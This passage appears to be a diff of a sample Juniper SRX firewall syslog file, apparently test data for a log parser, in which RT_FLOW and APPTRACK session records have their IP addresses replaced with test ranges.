packet-incoming-interface="reth6.0" encrypted="No "] -<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason="unset" source-address="216.160.83.57" source-port="63456" destination-address="175.16.199.1" destination-port="902" service-name="None" nat-source-address="175.16.199.1" nat-source-port="63456" nat-destination-address="5.6.7.8" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] -<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address="216.160.83.57" source-port="24065" destination-address="175.16.199.1" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address="216.160.83.57" source-port="1" destination-address="175.16.199.1" destination-port="46384" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" 
session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason="response received" source-address="216.160.83.57" source-port="1" destination-address="175.16.199.1" destination-port="46384" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP FIN" source-address="216.160.83.57" source-port="47776" destination-address="175.16.199.1" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="175.16.199.1" nat-source-port="19162" nat-destination-address="8.23.224.110" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] -<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason="TCP RST" 
source-address="216.160.83.57" source-port="53232" destination-address="175.16.199.1" destination-port="445" service-name="junos-smb" nat-source-address="175.16.199.1" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] -<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason="idle Timeout" source-address="216.160.83.57" source-port="52890" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" nat-source-address="175.16.199.1" nat-source-port="11152" nat-destination-address="58.68.126.198" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] -<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="idle Timeout" source-address="216.160.83.57" source-port="62047" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" nat-source-address="175.16.199.1" nat-source-port="20215" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" 
protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] -<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason="application failure or action" source-address="216.160.83.57" source-port="9057" destination-address="175.16.199.1" destination-port="21" service-name="junos-ftp" nat-source-address="175.16.199.1" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address="216.160.83.57" source-port="3129" destination-address="175.16.199.1" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address="216.160.83.57" source-port="3129" destination-address="175.16.199.1" 
destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="application failure or action" source-address="216.160.83.57" source-port="3129" destination-address="175.16.199.1" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" source-port="33040" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="175.16.199.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" 
elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" source-port="33040" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="175.16.199.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="216.160.83.57" source-port="48873" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address="216.160.83.57" source-port="24065" destination-address="175.16.199.1" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" 
nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="37233" destination-address="175.16.199.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="216.160.83.57" source-port="48873" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" 
source-port="58943" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="6018" nat-destination-address="175.16.199.1" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="idle Timeout" source-address="216.160.83.57" source-port="64720" destination-address="175.16.199.1" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="175.16.199.1" nat-source-port="24519" nat-destination-address="175.16.199.1" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 
2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" source-port="49583" destination-address="175.16.199.1" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="175.16.199.1" nat-source-port="30838" nat-destination-address="175.16.199.1" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="Closed by junos-alg" source-address="216.160.83.57" source-port="63381" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="26764" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 
2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="67.43.156.13" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="67.43.156.13" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="67.43.156.13" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="67.43.156.15" source-port="56639" destination-address="67.43.156.15" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] +<14>1 2014-05-01T08:28:10.933Z 
fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="unset" source-address="67.43.156.15" source-port="63456" destination-address="67.43.156.15" destination-port="902" service-name="None" nat-source-address="67.43.156.15" nat-source-port="63456" nat-destination-address="67.43.156.15" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] +<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2010-09-30T14:55:07.188+08:00 
mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="response received" source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="67.43.156.15" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="67.43.156.15" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] +<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" 
service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] +<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="67.43.156.14" source-port="52890" destination-address="67.43.156.14" destination-port="53" service-name="junos-dns-udp" nat-source-address="67.43.156.14" nat-source-port="11152" nat-destination-address="67.43.156.14" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] +<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="67.43.156.15" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" 
session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] +<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" 
nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” 
apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" 
